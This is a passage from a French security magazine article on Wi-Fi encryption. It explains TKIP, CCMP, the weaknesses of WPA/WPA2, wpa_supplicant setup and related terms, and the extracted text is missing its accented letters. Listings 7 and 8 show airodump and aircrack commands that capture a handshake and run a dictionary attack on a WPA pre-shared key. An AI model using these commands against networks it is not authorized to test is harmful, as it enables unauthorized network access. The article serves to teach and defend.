ticated Protocol).

Un concept important doit trecompris avant de dtailler chacunde ces protocoles : la diffrenceentre un MSDU (MAC Service Data

Unit) et un MPDU (MAC ProtocolData Unit). Les deux se rfrent un simple paquet de donnes,mais le MSDU reprsente un paquet

de donnes avant sa fragmentationalors que le MPDU reprsente lesmultiples units de donnes aprsfragmentation. Cette diffrenceest importante dans le protocolede chiffrement TKIP et CCMP cardans TKIP le MIC est calcul sur leMSDU tandis que dans CCMP il estcalcul sur le MPDU.

Tout comme le WEP, TKIP estbas sur l'algorithme de chiffrementRC4 mais il existe seulement pourune raison : an de permettre unemise jour aux systmes base deWEP pour bncier d'un protocoleplus scuris. TKIP est ncessairepour la certication WPA et est include manire optionnel dans le RSN802.11i. TKIP procure des correc-tions pour chaque faille du WEPdtaille prcdemment :

l'intgrit des messages : un nou-veau MIC (Message Integrity Co-de) bas sur l'algorithme Michaelpeut tre implment de manirelogicielle sur des processeurslents.

IV : nouvelle mthode de slec-tion de valeur des IV, reutilisationde l'IV en temps que compteuranti-rejeu (TSC, ou TKIP Se-quence Counter) et augmenta-tion de la taille de l'IV pour viter

sa rutilisation, Per Packet Key Mixing : pour ob-tenir des cls en apparence nonlies,

gestion des cls : nouveau m-chanisme pour la gnration et ladistribution des cls.

Le schma TKIP de mixage des clsest divis en deux phases. La phase 1implique les champs statiques lacl de session secrte TEK, l'adres-se MAC du transmetteur TA (inclusepour viter la collision d'IV) et les32 bits de poids fort de l'IV. La phase2 implique la sortie de la phase 1 etles 16 bits de poids faible de l'IV,changeant ainsi tous les bits duchamp Per Packet Keypour chaquenouvel IV. La valeur de l'IV com-mence toujours 0 et est incrmentde 1 pour chaque paquet transmis,tout message ayant un TSC infrieurou gal au message prcdent doittre rejet. La sortie de la phase 2 etune partie de l'IV tendu (ainsi qu'un

octet factice) sont l'entre de l'algo-rithme RC4, ce dernier gnrant unesuite chiffrante que l'on XOR avec letexte en clair de la MPDU, le MIC cal-cul sur le MPDU et le vieux ICV issudu WEP (voir la Figure 12).

Le calcul du MIC utilise l'algo-rithme Michael dvelopp par NielsFerguson. Il a t cr pour TKIPet dispose d'un niveau de scuritvoulu de 20 bits (cet algorithme n'uti-lise pas de multiplications pour des

raisons de performance car il se doitd'tre support sur des vieux qui-pements pour permettre leur mise jour vers WPA). cause de cette

Figure 11. Phase 3 : Group Key Handshake


11/15


Dossier

2

limitation, des contre-mesures sontncessaires pour viter la construc-tion du MIC. Les erreurs relatives auMIC doivent se maintenir en dessousde deux par minute pour viter unemise en quarantaine de 60 secondeset une re-ngociation des cls (GTKet PTK). Le MIC est calcul en utili-sant l'adresse source (SA), l'adressedestination (DA), le texte en clairMSDU et la TMK approprie (dpen-dant du sens de la communication,

Figure 12. Schma TKIP de mixage des cls et de chiffrement

Figure 13. Calcul du MIC en utilisant l'algorithme Michael

Figure 14. Chiffrement CCMP


12/15



une cl diffrente tant utilise pourla transmission et la rception).

CCMP est bas sur le chiffre-ment par bloc AES (Advanced En-cryption Standard) dans son moded'opration CCM avec une taille decl et de bloc de 128 bits. AES est CCMP ce que RC4 est TKIP maiscontrairement TKIP, qui a t faitpour s'accomoder du matriel WEPexistant, il n'est pas un compromisde scurit mais une nouvelle archi-tecture de protocole. CCMP utilisele mode compteur en combinaisonavec la mthode d'authenticationdes messages appelle Cipher Block

Chaining(CBC-MAC) permettant deproduire un MIC.

Des proprits intressantesfurent aussi ajoutes comme l'uti-lisation d'une simple cl pour lechiffrement et l'authentication desdonnes (avec un vecteur d'initia-lisation diffrent pour chacun) oul'authentication de donnes nonchiffres. Le protocole CCMP ajoute16 octets au MPDU : 8 octets pourl'en-tte CCMP et 8 octets pour leMIC. L'en-tte CCMP est un champnon chiffr inclu entre l'en-tte MACet la partie des donnes chiffrescontenant les 48 bits du PN (PacketNumber= IV tendu) et le Group KeyKeyID. Le PN est incrment de unpour chaque MPDU.

Le calcul du MIC utilise l'algo-rithme CBC-MAC qui chiffre un blocalatoire de dpart (obtenu grce auchamp Priority, l'adresse sourcedu MPDU et au PN incrment)et XOR les blocs suivants pour ob-

tenir un MIC nal sur 64 bits (le MICnal fait 128 bits mais les 64 bits depoids faible sont carts). Le MIC estalors concatn aux donnes en clairpour le chiffrement AES en modecompteur. Ce compteur est construitsur une valeur alatoire identique celle utilise pour le MIC combine un compteur incrment de 1 pourchaque bloc.

Le dernier protocol est le WRAP,aussi bas sur AES, mais utilisant le

schma de chiffrement et d'authen-tication OCB (Offset CodebookMode). OCB fut le premier modeslectionn par le groupe de travail

IEEE 802.11i mais il fut abandonn cause de problmes de propritintellectuelle et d'une ventuellelicence. CCMP fut alors adoptcomme obligatoire.

Les faiblesses deWPA/WPA2Quelques faiblesses ont t dcou-vertes dans WPA/WPA2 depuis leursortie, aucune d'entre elles n'est criti-que si des recommandations simplesde scurit sont suivies.

La vulnrabilit la plus exploi-table est une attaque contre la clPSK utilise dans WPA/WPA2.Comme dj mentionn prcdem-ment, la PSK est une alternative la gnration de la PMK par deschanges 802.1X bass sur unserveur d'authentication. La PSKest une chane de caractres de256 bits ou une phrase secrte

comprise entre 8 et 63 caractresde laquelle on extrait la chane decaractres par un algorithme con-nu : PSK = PMK = PBKDF2 (phrasesecrte, SSID, longueur du SSID,4096, 256) o PBKDF2 est une m-thode issue de PKCS#5, 4096 estle nombre de hachage successifset 256 la taille de la sortie. La PTKest drive de la PMK en utilisant le4-Way Handshakeet toute les infor-mations ncessaires son calcul

sont transmises en clair.La force de la PTK repose uni-quement sur la valeur de la PMK,qui dans le cas de la PSK repose

sur la force de la phrase secrtel'ayant gnre. Comme soulignpar Robert Moskowitz, le secondmessage du 4-Way Handshakepeut tre sujet des attaques pardictionnaire et force brute hors li-gne. L'utilitaire cowpatty a t crpour exploiter cette faiblesse et soncode source fut repris et amliorpar Christophe Devine dans Air-crack an de raliser des attaquespar force brute ou dictionnaire sur laPSK du WPA. L'architecture du pro-tocole (4096 hachage pour chaquetentative de phrase secrte) impli-que que les attaques de type bruteforce soient trs lentes (quelquescentaines de phrases secrtes parseconde sur le dernier modle deprocesseur). La PMK ne peut pastre pr-calcule (et mise dans destables) car la phrase secrte dis-pose d'une grane bas sur l'ESSID.

Une phrase secrte n'apparaissantdans aucun dictionnaire (et de taillesuprieur 20 caractres) doit trechoisie pour se protger contrecette faiblesse.

Pour raliser cette attaque, unattaquant doit capturer les mes-sages du 4-Way Handshake enscrutant passivement les trames durseau sans l ou en utilisant l'atta-que par d-authentication (dcriteprcdemment) pour acclrer le

processus. En fait, seul les deuxpremiers messages sont requispour tester les choix de PSK. On sesouvient que la PTK = PRF-X (PMK,

Listing 7. Dcouverte des rseaux et des clients Wi-Fi environnants

# airodump ath0 wpa-crk 0

BSSID PWR Beacons # Data CH MB ENC ESSID

00:13:10:1F:9A:72 56 112 16 1 48 WPA hakin9demo

BSSID STATION PWR Packets ESSID

00:13:10:1F:9A:72 00:0C:F1:19:77:5C 34 1 hakin9demo

Listing 8. Lancement de l'attaque par dictionnaire

$ aircrack -a 2 -w some_dictionnary_le -0 wpa-psk.cap

Opening wpa-psk.cap

Read 541 packets.

BSSID ESSID Encryption

00:13:10:1F:9A:72 hakin9demo WPA (1 handshake)


13/15


14/15



et John C. Mitchell identirent que lepremier message du 4-Way Hands-hake n'tait pas authenti et quechaque client devait stocker chaque1er message jusqu' rception d'untroisime message (sign), laissantalors le client potentiellement vulnra-ble une saturation de mmoire. Enusurpant le premier message envoypar le point d'accs, un attaquantpeut raliser un dni de service sur leclient si plusieurs sessions simulta-nes peuvent coexister simultan-ment au niveau du client.

L'algorithme Michael utilis pourcalcul le MIC a aussi des faiblessesrsultant de son design (vouluespar le groupe de travail 802.11i). Lascurit de Michael repose sur le faitqu'il est chiffr au sein du paquet.Les fonctions cryptographiques pourcalculer des MIC sont habituelle-ment rsistante au attaques en clair

connu (o l'attaquant dispose dumessage en clair et du MIC), maisMichael s'avre vulnrable a cetype d'attaque car il est inversible.En connaissant un message et savaleur MIC associe, il est possiblede dcouvrir la cl secrte servant

calculer le MIC, le secret du MICest donc critique.

La dernire vulnrabilit connueest une attaque thorique possiblesur les Temporal KeyHashdu WPAen rduisant la complexit de l'atta-que (de 128 105) sous certainesconditions (connaissance de certai-nes cls RC4).

Le WPA/WPA2 est aussi sujeta des vulnrabilits affectant d'autremchanismes standard au sein dela norme 802.11i comme les atta-ques par usurpation des messages802.1X (

EAPoL Logoff,

EAPoLStart, EAP Failure etc.) dcrites parWilliam A. Arbaugh et Arunesh Mishraune nouvelle fois des au manqued'authentication. Enn il est importantde noter que l'utilisation des proto-coles WPA/WPA2 n'empchera pasdes attaques sur les couches bassestels que le brouillage radio, les dnisde service par violation de la norme802.11, les d-authentications, lesd-associations, etc.

Implmentationde WPA/WPA2dans les systmesd'exploitationDans Windows, le support WPA2n'est pas inclu de base. Une mise

jour de Windows XP SP2(KB893357) est sortie le 29 avril

2005 ajoutant le support de WPA2 etamliorant la dtection des rseauxsans l (voir la Figure 16). Les autresversions de Windows doivent utiliserun client (supplicant) externe (com-merciaux ou open source, commewpa_supplicant la version Win-dows tant exprimentale).

Sous Linux et les diffrents typesde BSD, wpa_supplicant impl-mentait dj le support WPA2 dsla sortie de la norme nale 802.11i.Il supporte un grand nombre de m-thodes EAP et de fonctionnalits degestion de cls pour WPA, WPA2 etWEP. Plusieurs rseaux peuvent tredclars au sein d'un mme chierde conguration disposant de chif-frement, gestion des cls, mthodesEAP varies. La Listing 9 prsenteun chier basique de congurationpour un rseau bas sur WPA2.L'emplacement par dfaut pour lechier de conguration de wpa_sup-plicantest/etc/wpa_supplicant.conf,

ce chier doit tre uniquement ac-cessible l'utilisateur root.

Le dmon wpa_supplicant doittre lanc avec les privilges rooten mode dbogage dans un pre-mier temps (option -dd), avec lesupport du bon pilote (dans notreexemple cela correspond l'op-tion -D madwif pour supporter lapuce Atheros), le nom de l'interface(avec l'option -i, dans notre casath0) et le chemin du chier de con-

guration (option -c) :

# wpa_supplicant

-D madWi-Fi

Figure 16. Support du WPA2 dansWindows XP SP2

Listing 9. Exemple de chier de conguration wpa_supplicant pour unrseau WPA2

ap_scan=1 # Scan des frquences radio et slection# du point d'accs appropri

network={ # Premier rseau sans l

ssid="some_ssid" # SSID du rseau

scan_ssid=1 # Forcer l'envoi de Probe Request

# pour la dcouverte de SSID cachs

proto=RSN # RSN pour WPA2/IEEE 802.11i

key_mgmt=WPA-PSK # Authentication par cl pr-partage (Pre-Shared Key)

pairwise=CCMP # Protocol CCMP (chiffrement AES)

psk=1232813c587da145ce647fd43e5908abb45as4a1258fd5e410385ab4e5f435ac

}

propos de l'auteurGuillaume Lehembre est un consultant scurit franais travaillant pour le cabinetHSC (Herv Schauer Consultants http://www.hsc.fr) depuis 2004. Il a travaill surdiffrents audits, tudes et tests d'intrusion et a acquis une exprience certaine dans

la scurit des rseaux sans ls. Il a publi des articles et ralis des interventionspubliques sur ce sujet. Guillaume peut tre contact l'adresse suivante : [email protected].


15/15

Dossier

-dd -c /etc/wpa_supplicant.conf

-i ath0

Toutes les tapes thoriques dcri-

tes prcdements sont visibles dansle mode de debogage (association l'AP, authentication 802.1X, 4-WayHandshake, etc.). Quand tout fonc-tionne correctement, wpa_supplicantpeut tre lanc en mode dmon (enremplaant l'option -ddpar -B).

Sur Macintosh, le WPA2 estsupport avec la mise jour 4.2 del'utilitaire Apple AirPort : AirPort Ex-

treme-enabled Macintoshes, AirPortExtreme Base Station et le AirPortExpress.

ConclusionIl est clair que le protocole de chif-frement WEP ne garantie pas unescurit sufsante pour les rseauxsans l Wi-Fi, il ne peut qu'tre utilisen complmentarit d'une solutionde chiffrement de plus haut niveau(comme les technologies VPN).Le WPA reprsente une solutionscurise pour les quipements

supportant une mise jour mais nepouvant passer au WPA2 mais cedernier reprsente une solution plusprenne et sera l'avenir le standard

en terme de scurit des rseauxsans ls Wi-Fi. N'oubliez pas depositionner vos rseaux sans lsdans une zone ltre spare et degarder toujours une connexion laire porte pour les rseaux critiques le brouillage radio et les attaquesde bas niveau (violation du standard802.11, fausse d-association, etc.)tant toujours dvastatrices. l

Glossaire

AP Access Point, station de base pour un rseau Wi-Fi (ap-pel aussi point d'accs ou borne) interconnectant les clientssans l entre eux ainsi qu'au rseau laire.

ARP Address Resolution Protocol, protocole faisant la cor-respondance entre adresse IP et adresse MAC.

BSSID Basic Service Set Identier, adresse MAC du pointd'accs.

CCMP Counter-Mode/Cipher Block Chaining MessageAuthentication Code Protocol, protocole de chiffrement uti-lis dans WPA2 bas sur l'algorithme de chiffrement par blocAES.

CRC Cyclic Redundancy Check, algorithme de pseudo-intgrit utilis par le protocole WEP (comporte de nombreu-ses faiblesses).

EAP Extensible Authentication Protocol, cadre de travailpour des mthodes d'authentication varies.

EAPOL EAP Over LAN, protocole utilis dans les rseauxsans l pour le transport d'EAP.

GEK Group Encryption Key, cl de chiffrement pour le tracen diffusion (aussi utilise pour l'intgrit des donnes dansCCMP).

GIK Group Integrity Key, cl d'intgrit pour le trac endiffusion (utilis dans TKIP).

GMK Group Master Key, cl matresse de la hirarchie degroupe.

GTK Group Transient Key, cl drive de la GMK. ICV Integrity Check Value, champ de donne concatn

aux donnes en clair pour garantir l'intgrit (bas sur l'algo-rithme faible CRC32).

IV Initialization Vector, donne combine la cl de chiffre-ment an de produire une suite chiffrante unique.

KCK Key Conrmation Key, cl d'intgrit utilise pourprotger les changes de cl.

KEK Key Encryption Key, cl de condentialit utilise pourprotger les changes de cl.

MIC Message Integrity Code, champ de donne ajoutaux donnes en clair pour garantir l'intgrit (bas sur l'algo-rithme Michael).

MK Master Key, cl matresse connue du client 802.1x etdu serveur d'authentication l'issu du processus d'authen-tication 802.1x.

MPDU Mac Protocol Data Unit, paquet de donne avantfragmentation.

MSDU Mac Service Data Unit, paquet de donne aprsfragmentation.

PAE Port Access Entity, port logique 802.1x. PMK Pairwise Master Key, cl matresse de la hirarchie

de cl pairwise. PSK Pre-Shared Key, cl drive d'un mot de passe,

remplaant la PMK normalement issue d'un vrai serveurd'authentication.

PTK Pairwise Transient Key, cl drive de la PMK. RSN Robust Security Network, mchanismes de scurit

802.11i (TKIP, CCMP etc.). RSNA Robust Security Network Association, association

de scurit utilise dans RSN. RSN IE Robust Security Network Information Element,

champ contenant les informations RSN inclues dans lestrames Probe ResponseetAssociation Request.

SSID Service Set Identier, identiant du rseau sans l(identique l'ESSID).

STA Station, un client sans l. TK Temporary Key, cl pour le chiffrement des donnes

destination d'une machine (unicast) (utilis pour le calculdes donnes d'intgrit dans le protocole CCMP).

TKIP Temporal Key Integrity Protocol, protocole de chiffre-

ment utilis dans le WPA, bas sur l'algorithme de chiffementRC4 (comme le WEP).

TMK Temporary MIC Key, cl pour l'authenticit des don-nes du trac destination d'une machine (unicast) (utilisdans TKIP).

TSC TKIP Sequence Counter, compteur anti-rejeu utilisdans TKIP (bas sur l'IV tendu).

TSN Transitional Security Network, mchanismes de scu-rit pre-802.11i (WEP etc.).

WEP Wired Equivalent Privacy, protocole de chiffrementpar dfaut des rseaux sans l de type 802.11.

WPA Wireless Protected Access, implmentation d'unepr-version de la norme 802.11i base sur le protocole dechiffrement TKIP.

WRAP Wireless Robust Authenticated Protocol, ancienprotocole de chiffrement utilis dans le WPA2.

fr - wi-fi - wep, wpa et wpa2.pdf

Documents